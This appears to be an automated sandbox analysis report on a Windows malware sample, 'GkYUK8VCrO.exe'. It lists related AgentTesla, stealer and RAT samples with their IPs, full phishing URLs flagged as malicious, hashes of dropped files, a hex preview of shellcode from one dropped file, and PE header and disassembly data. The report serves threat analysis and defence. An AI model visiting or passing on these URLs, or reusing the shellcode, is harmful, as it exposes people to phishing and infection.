                              Drawing specification and June PO #07329.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 104.26.12.205
                              IMG_067_6331002.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 104.26.13.205
                              MV RIVA WIND - VESSEL's PARTICULARS.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.12.205
                              mail.fasmacopy.grRFQ_4155965-EU2406.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 79.170.44.32
                              ltd93En22P.exeGet hashmaliciousAgentTeslaBrowse
                              • 79.170.44.32
                              ejXrW4Jf9o.exeGet hashmaliciousAgentTeslaBrowse
                              • 79.170.44.32
                              U39qqK8E7o.exeGet hashmaliciousAgentTeslaBrowse
                              • 79.170.44.32
                              RFQ-P023102417.docGet hashmaliciousAgentTeslaBrowse
                              • 79.170.44.32
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              GODADDYDERFQ_4155965-EU2406.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 79.170.44.32
                              qoe1X4ig0N.exeGet hashmaliciousLummaC, AsyncRAT, DarkTortilla, LummaC Stealer, Njrat, SmokeLoader, StormKittyBrowse
                              • 176.29.154.25
                              ltd93En22P.exeGet hashmaliciousAgentTeslaBrowse
                              • 79.170.44.32
                              ejXrW4Jf9o.exeGet hashmaliciousAgentTeslaBrowse
                              • 79.170.44.32
                              U39qqK8E7o.exeGet hashmaliciousAgentTeslaBrowse
                              • 79.170.44.32
                              RFQ-P023102417.docGet hashmaliciousAgentTeslaBrowse
                              • 79.170.44.32
                              V4zFzdCyty.elfGet hashmaliciousMirai, MoobotBrowse
                              • 178.77.110.221
                              mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                              • 79.170.44.218
                              doTtQFWKly.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                              • 176.29.154.25
                              https://app12.runmags.com/Get hashmaliciousUnknownBrowse
                              • 85.195.101.122
                              CLOUDFLARENETUSINQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                              • 172.67.148.197
                              https://forms.promo-pharmacies.gr/6659c951cdd608959f27a77dGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
                              • 104.21.53.203
                              Attachment_8378637861.170631.HTMGet hashmaliciousUnknownBrowse
                              • 104.17.25.14
                              INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                              • 104.21.11.106
                              https://click.pstmrk.it/3s/marryatbali.com%2Fdev%2F/EUHQ/Il62AQ/AQ/b5b2a7e4-6441-4a86-be73-2bf498fd1e9a/1/MLzcqAxPmjGet hashmaliciousHTMLPhisherBrowse
                              • 104.17.25.14
                              http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDd8ji5dO-2BtGjFwdkKxtwV-2BT-2FIDZLBFuspWHIOxNeRRYzjnPYwPcANsM7g6bBF5Eb-2FtBeYO84se-2BxM2-2FftOX61g3tKjw4-2BmFTEe65zPmmIV01t1qMegNLN27WQA4-2BWSzp8Exonts6yxo7jLDqmXJMwdw-3DSDkl_fylF09WDx4VRLHs1TE6by-2Fm24mY0V6PaWh-2BQeqn0Ay-2FMm-2FGvFUfwxkNWNqnFtCc1bg3RDtukBd6YTikFNr9njJPj8fPjtMTy7wESEphTN1Xt33p1RcATr-2Faa6esQ5neBHfE9PchIfWN2pGu-2FDyTo9jBl7IxKpEon9SyD5nvMkxE22jB5lqUsSt3NSAbiAi6xLdjPQNgUE2zZRGhN5aAjyw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                              • 104.17.2.184
                              https://endress-dot-polynomial-net-415922.uk.r.appspot.com/Get hashmaliciousUnknownBrowse
                              • 1.1.1.1
                              http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDZIRt5HYOjqWnCYPyN2LzfWA5WJpqP15j9jckbuN-2BOb3WHvq-2F0cJQJdn87kO0MSPy0cFUfIeq9yRYQqhn4htwvkWsNx-2FFam80MMPtdHc4W-2BjtofBO6rARCMSHyY6bevTzA-3D-3Dl5B0_ZmIHaGi20aqBKA3sG1JfXxzr0sPFOA2uIfsKnhz-2FHsHlNN56Un7vVp-2FHLlgOEVpr0kMJXFtRNAtOmyfAL3Lkes92MiYR3EbwQLlO4as4ETAbkJiOU1P-2F6SWFB0T3LaiXQjVG47m8S-2B1KmL8spseUk6IF4zRohQ-2B-2FFQktOHSnuyuc8HWSvn8BvqxHU3iGIxrIS-2FUCmGYTBpWBLsLVoZYmGg-3D-3DGet hashmaliciousHTMLPhisherBrowse
                              • 104.17.2.184
                              8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                              • 172.67.194.145
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0ehttps://forms.promo-pharmacies.gr/6659c951cdd608959f27a77dGet hashmaliciousUnknownBrowse
                              • 104.26.12.205
                              http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDd8ji5dO-2BtGjFwdkKxtwV-2BT-2FIDZLBFuspWHIOxNeRRYzjnPYwPcANsM7g6bBF5Eb-2FtBeYO84se-2BxM2-2FftOX61g3tKjw4-2BmFTEe65zPmmIV01t1qMegNLN27WQA4-2BWSzp8Exonts6yxo7jLDqmXJMwdw-3DSDkl_fylF09WDx4VRLHs1TE6by-2Fm24mY0V6PaWh-2BQeqn0Ay-2FMm-2FGvFUfwxkNWNqnFtCc1bg3RDtukBd6YTikFNr9njJPj8fPjtMTy7wESEphTN1Xt33p1RcATr-2Faa6esQ5neBHfE9PchIfWN2pGu-2FDyTo9jBl7IxKpEon9SyD5nvMkxE22jB5lqUsSt3NSAbiAi6xLdjPQNgUE2zZRGhN5aAjyw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                              • 104.26.12.205
                              PO 4500005168 NIKOLA.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.12.205
                              https://stef.start.page/Get hashmaliciousUnknownBrowse
                              • 104.26.12.205
                              https://r.clk71.com/s.ashx?ms=AZ71:218551_111930&e=aundrea.leone*40boarshead.com&eId=916323793&c=h&url=https*3a*2f*2fad.doubleclick.net*2fddm*2ftrackclk*2fN30602.5158887REACHMARKETING*2fB31024378.397824557*3bdc_trk_aid*3d589624573*3bdc_trk_cid*3d217531267*3bdc_lat*3d*3bdc_rdid*3d*3btag_for_child_directed_treatment*3d*3btfua*3d*3bltd*3d*3bdc_tdv*3d1__;JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl!!KtM2tloZCg!oGzQgrCoYVGJMf6PfDh7IcY45hV0gU-qan8_64QWQnObIIvjhEDVQBbkVGXSn4d1-t_Kr3TB7F4EvB4UjY73BA$&data=05%7C02%7CReportPhish@boarshead.com%7C1f7dece21969420941fa08dc99e4dbc4%7Cb2bfef19062843c684cc966ab48412de%7C0%7C0%7C638554455432035929%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=Kp2blQOuKNOD36q+ozMhAXZ4VpLjNRlb3yoQmzJAvSU=&reserved=0Get hashmaliciousUnknownBrowse
                              • 104.26.12.205
                              http://jeezipax.co.inGet hashmaliciousHTMLPhisherBrowse
                              • 104.26.12.205
                              https://singlecity.it/test/E/1.htmGet hashmaliciousUnknownBrowse
                              • 104.26.12.205
                              https://docs.google.com/drawings/d/15tWfWcuT_MrF3j6quKPc0b_4CSv3-qwRuN5mj0BJkas/previewGet hashmaliciousUnknownBrowse
                              • 104.26.12.205
                              DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              • 104.26.12.205
                              F46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.12.205
                              No context
                              Process:C:\Users\user\Desktop\GkYUK8VCrO.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):266680
                              Entropy (8bit):7.977471232917895
                              Encrypted:false
                              SSDEEP:6144:ehejQs2jX6J601aIsyvmiLubwl6+pcJLc5n/tAhHL/exo/mb//+:ecjn2mkV3yibycFenmr/r+bX+
                              MD5:5EB223F71EFB99F6F2D5A5954E6C5042
                              SHA1:DC085E5624BC341861050055E855CC81ED038163
                              SHA-256:1EC71F7B0A255784E012D4046FD3B2A5F5B23B5FE89E4101014E8054F3D14AC5
                              SHA-512:B282C6BD1A8AF9E740F0004E818851A87826EDF0F31D6B40F98F5C2A5AE30646B7B6C0E91A8F90150AEB06760A4B0FFC468177F5579F5803F4BA4C842050EC16
                              Malicious:false
                              Reputation:low
                              Preview:EA06.......4..f.V.S.4.7:.V..iT .....k3.-Z....p.....).o.b...`/..$k.x.J.....y..J.....q$.M..it..?.W..}....Z.r9T..T.S.@.y.W....._(..4...y2.X.Rxt.y?..zr{..M0..6T..W'.Xf.JT.I?......g4.^.2...W3..$........f ...+...`.:.*E.D@.....j.z}".Y..*... .J..............u...ZU(5.x..i..Z....U....Q...G..J.S).....A...qQ.,.L..@...n.....R....3...j...`.AT..K ...U...'.x.J.3....R.T....ZM@.~....w.I...2......j.f.,..:..........I...<.....>.1...........VqW...g...?[P..sH.S7...F....\h.h..........c...A.vx.......Vy;jU..M..e.x...B......7....sX.....jk4..2....)w...J..).nl'.......k...k.<,_.Q.i#..-:...s.^..k.g.R.....T..;....h..1..=.M1......>............R+?.u..|..82.l*.J...0.vbk..P%.x.n..K....\...D..9.t. ..*?........d...H..G..8..G{B.@.^...qz..T....j.../.1.x2u......l...l.s....;].....g....EI..y@.e..7.@._.,G...\'._.X.....bYy....x......h...(.....M/f...K)...sO..Bo.Y.g.r.0..2.A..9.Z...._k...}..[.p..k.N....kB..#..h....g.....I......7.H..x.*V.M...bVZ.[..Pkt.|..s.qp.....X-.2....A7Z.&.....
                              Process:C:\Users\user\Desktop\GkYUK8VCrO.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9850
                              Entropy (8bit):7.599092609745426
                              Encrypted:false
                              SSDEEP:192:65jwEiqxwzMZTG3c6Vg0X9O1JZUv3QfyYxvoy6LM0nE8j3+UGxLrHJc9kUcN:I6qxwzMZy3QU9Obysvoy8EOvGxXHJ6kX
                              MD5:7C9D2A1303A8B217A6D1CB061F0C130C
                              SHA1:FFFE477B327679FCB57529C452E08DDC51EA3D10
                              SHA-256:4FD3FE19394E7A853EFCBF7182CD78604A11C5BDB579878AE0E31691181CE368
                              SHA-512:502C5B38CCE50303A7C104CEED3C69A27CBC61EEF50E6145C4D36E66C4ACDEB5C729EF8903A458DAF6CEB1CA9028473364318A498C038544AB1C397F8E73DC00
                              Malicious:false
                              Reputation:low
                              Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                              Process:C:\Users\user\Desktop\GkYUK8VCrO.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):266680
                              Entropy (8bit):7.977471232917895
                              Encrypted:false
                              SSDEEP:6144:ehejQs2jX6J601aIsyvmiLubwl6+pcJLc5n/tAhHL/exo/mb//+:ecjn2mkV3yibycFenmr/r+bX+
                              MD5:5EB223F71EFB99F6F2D5A5954E6C5042
                              SHA1:DC085E5624BC341861050055E855CC81ED038163
                              SHA-256:1EC71F7B0A255784E012D4046FD3B2A5F5B23B5FE89E4101014E8054F3D14AC5
                              SHA-512:B282C6BD1A8AF9E740F0004E818851A87826EDF0F31D6B40F98F5C2A5AE30646B7B6C0E91A8F90150AEB06760A4B0FFC468177F5579F5803F4BA4C842050EC16
                              Malicious:false
                              Reputation:low
                              Preview:EA06.......4..f.V.S.4.7:.V..iT .....k3.-Z....p.....).o.b...`/..$k.x.J.....y..J.....q$.M..it..?.W..}....Z.r9T..T.S.@.y.W....._(..4...y2.X.Rxt.y?..zr{..M0..6T..W'.Xf.JT.I?......g4.^.2...W3..$........f ...+...`.:.*E.D@.....j.z}".Y..*... .J..............u...ZU(5.x..i..Z....U....Q...G..J.S).....A...qQ.,.L..@...n.....R....3...j...`.AT..K ...U...'.x.J.3....R.T....ZM@.~....w.I...2......j.f.,..:..........I...<.....>.1...........VqW...g...?[P..sH.S7...F....\h.h..........c...A.vx.......Vy;jU..M..e.x...B......7....sX.....jk4..2....)w...J..).nl'.......k...k.<,_.Q.i#..-:...s.^..k.g.R.....T..;....h..1..=.M1......>............R+?.u..|..82.l*.J...0.vbk..P%.x.n..K....\...D..9.t. ..*?........d...H..G..8..G{B.@.^...qz..T....j.../.1.x2u......l...l.s....;].....g....EI..y@.e..7.@._.,G...\'._.X.....bYy....x......h...(.....M/f...K)...sO..Bo.Y.g.r.0..2.A..9.Z...._k...}..[.p..k.N....kB..#..h....g.....I......7.H..x.*V.M...bVZ.[..Pkt.|..s.qp.....X-.2....A7Z.&.....
                              Process:C:\Users\user\Desktop\GkYUK8VCrO.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9850
                              Entropy (8bit):7.599092609745426
                              Encrypted:false
                              SSDEEP:192:65jwEiqxwzMZTG3c6Vg0X9O1JZUv3QfyYxvoy6LM0nE8j3+UGxLrHJc9kUcN:I6qxwzMZy3QU9Obysvoy8EOvGxXHJ6kX
                              MD5:7C9D2A1303A8B217A6D1CB061F0C130C
                              SHA1:FFFE477B327679FCB57529C452E08DDC51EA3D10
                              SHA-256:4FD3FE19394E7A853EFCBF7182CD78604A11C5BDB579878AE0E31691181CE368
                              SHA-512:502C5B38CCE50303A7C104CEED3C69A27CBC61EEF50E6145C4D36E66C4ACDEB5C729EF8903A458DAF6CEB1CA9028473364318A498C038544AB1C397F8E73DC00
                              Malicious:false
                              Reputation:low
                              Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                              Process:C:\Users\user\Desktop\GkYUK8VCrO.exe
                              File Type:ASCII text, with very long lines (28756), with no line terminators
                              Category:dropped
                              Size (bytes):28756
                              Entropy (8bit):3.590881180643552
                              Encrypted:false
                              SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+IC6bd4vfF3if6gyu+:miTZ+2QoioGRk6ZklputwjpjBkCiw2RS
                              MD5:305BB017AB99D5316C314D5816BEC805
                              SHA1:77097732DD6DCF41936BF4EE3F2CCBCA4C7D105E
                              SHA-256:08835C865FBD87849FDD4C6F4ADBDD7429A9B8129669A3F8820B39795A3B34A3
                              SHA-512:965E4DFA1D97A754365E4C257129687CD5EFF90C17AC4B28EB3A18BFF44D355B9DC6F448016B1D8ABD4D7BECCADC45D5C6D75FC5A694990368E9C1AA46B89B50
                              Malicious:false
                              Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff
                              Process:C:\Users\user\Desktop\GkYUK8VCrO.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):267776
                              Entropy (8bit):7.852716166683299
                              Encrypted:false
                              SSDEEP:6144:sFMKoPN6TByDlIHahZ22Bo+EJOSDbc7a9UUsAU2ZMgJx8w75mwdu3QWQ:SMvcTByDlIHIZ22+Jvc7LUlfZMg3z5mu
                              MD5:AC28303061B7C22A484B91842E1B59F9
                              SHA1:343A2F2550ACE32A661B22EB13264FD3C9770803
                              SHA-256:A559ABB286EB3A67054546CFD170E2DB85267F35DC03F80FCFCC927591876FE9
                              SHA-512:6408C7CA15CC7FCCA7DA853BC3F458CF4FD5B53075074A2B068E5B3DC94D4004C4016BDE492F962EF80AE36C9D9D11D7BB4B885EB6B3C55F81B1A5205883E765
                              Malicious:false
                              Preview:...JAYJVHNAM..EV.YJBYJVL.AMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1E.AYJLF.XL.H.x.D..x.*09v<<.*+P(v"8$,6>v.+a?,_e?/y...j;#*$cT<OrAYJBYJV$^.`u@.(m(.<u;.2|b2'.4.?R..'a'.0m<.O.'.'xa74J=.?.zX;.0.4pz1(a?.3.X&>m(.<YJVLNAMY1EVAYJBY..(AMY1..AY.C]J".N.MY1EVAYJ.YiWGOHMY.DVA#HBYJVLa.MY1UVAY.CYJV.NA]Y1ETAYOBYJVLNAHY1EVAYJB9NVLJAM..GVCYJ.YJFLNQMY1EFAYZBYJVLNQMY1EVAYJBYJ.YLA.Y1EV![J.KVLNAMY1EVAYJBYJVLNAMY1EVA..CYVVLNAMY1EVAYJBYJVLNAMY1EVAYJ.THV.NAMY1EVAYJBY.WL.@MY1EVAYJBYJVLNAMY1EVAYJBYJx8+99Y1EN.XJBIJVL.@MY5EVAYJBYJVLNAMY.EV!w8&8>7LN. Y1E.@YJ,YJV.OAMY1EVAYJBYJV.NA.wU$" YJB.zVLNaOY1SVAY@@YJVLNAMY1EVAY.BY.x>=3.Y1E..XJB9HVL.@MY.GVAYJBYJVLNAMYqEV.YJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLN
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.711463104926535
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:GkYUK8VCrO.exe
                              File size:1'623'552 bytes
                              MD5:7d50650cd2ba63482d4caf875ae65a8e
                              SHA1:037e5a7f82d5c436f744e5b7475f6264c32e6519
                              SHA256:b54b494944a8b5268e3d3190c5a45af28afdada7eb0fc85fece3c22e2d31b3f1
                              SHA512:cc245b8725f43a80a80e25ed3b266293592abda1f451cf80b30b42f90cac4b1898200673b2c87b58c0bcb022d4eb1bfa7a4cbc6ab2f46a3f6ec113842c7fcbb7
                              SSDEEP:24576:kAHnh+eWsN3skA4RV1Hom2KXMmHa5rS/G23VGNGfi8mBLWUK5:zh+ZkldoPK8Ya5+/x3VGNJZy
                              TLSH:19757C127753C4BEFE7F82F2191D75608A34BD289427582F13EB794597B42A0F12B3A2
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                              Icon Hash:0404961c16d6662e
                              Entrypoint:0x42800a
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66825290 [Mon Jul 1 06:54:08 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                              Instruction
                              call 00007F8818BA656Dh
                              jmp 00007F8818B99324h
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              push edi
                              push esi
                              mov esi, dword ptr [esp+10h]
                              mov ecx, dword ptr [esp+14h]
                              mov edi, dword ptr [esp+0Ch]
                              mov eax, ecx
                              mov edx, ecx
                              add eax, esi
                              cmp edi, esi
                              jbe 00007F8818B994AAh
                              cmp edi, eax
                              jc 00007F8818B9980Eh
                              bt dword ptr [004C41FCh], 01h
                              jnc 00007F8818B994A9h
                              rep movsb
                              jmp 00007F8818B997BCh
                              cmp ecx, 00000080h
                              jc 00007F8818B99674h
                              mov eax, edi
                              xor eax, esi
                              test eax, 0000000Fh
                              jne 00007F8818B994B0h
                              bt dword ptr [004BF324h], 01h
                              jc 00007F8818B99980h
                              bt dword ptr [004C41FCh], 00000000h
                              jnc 00007F8818B9964Dh
                              test edi, 00000003h
                              jne 00007F8818B9965Eh
                              test esi, 00000003h
                              jne 00007F8818B9963Dh
                              bt edi, 02h
                              jnc 00007F8818B994AFh
                              mov eax, dword ptr [esi]
                              sub ecx, 04h
                              lea esi, dword ptr [esi+04h]
                              mov dword ptr [edi], eax
                              lea edi, dword ptr [edi+04h]
                              bt edi, 03h
                              jnc 00007F8818B994B3h
                              movq xmm1, qword ptr [esi]
                              sub ecx, 08h
                              lea esi, dword ptr [esi+08h]
                              movq qword ptr [edi], xmm1
                              lea edi, dword ptr [edi+08h]
                              test esi, 00000007h
                              je 00007F8818B99505h
                              bt esi, 03h
                              Programming Language:
                              • [ASM] VS2013 build 21005
                              • [ C ] VS2013 build 21005
                              • [C++] VS2013 build 21005
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [ASM] VS2013 UPD5 build 40629
                              • [RES] VS2013 build 21005
                              • [LNK] VS2013 UPD5 build 40629
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000xc1f0c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x18a0000x7134.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xc80000xc1f0c0xc200001bb6f525b158d720ada14f00ea60dd9False0.48596443097615977data6.471854093469766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x18a0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xc85d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                              RT_ICON0xc87000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                              RT_ICON0xc88280x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                              RT_ICON0xc89500x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishGreat Britain0.02376320383465988
                              RT_ICON0x10a9780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.07906956110256713
                              RT_ICON0x11b1a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.17179945343704014
                              RT_ICON0x1246480x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.21233826247689463
                              RT_ICON0x129ad00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.17873169579593765
                              RT_ICON0x12dcf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.3057053941908714
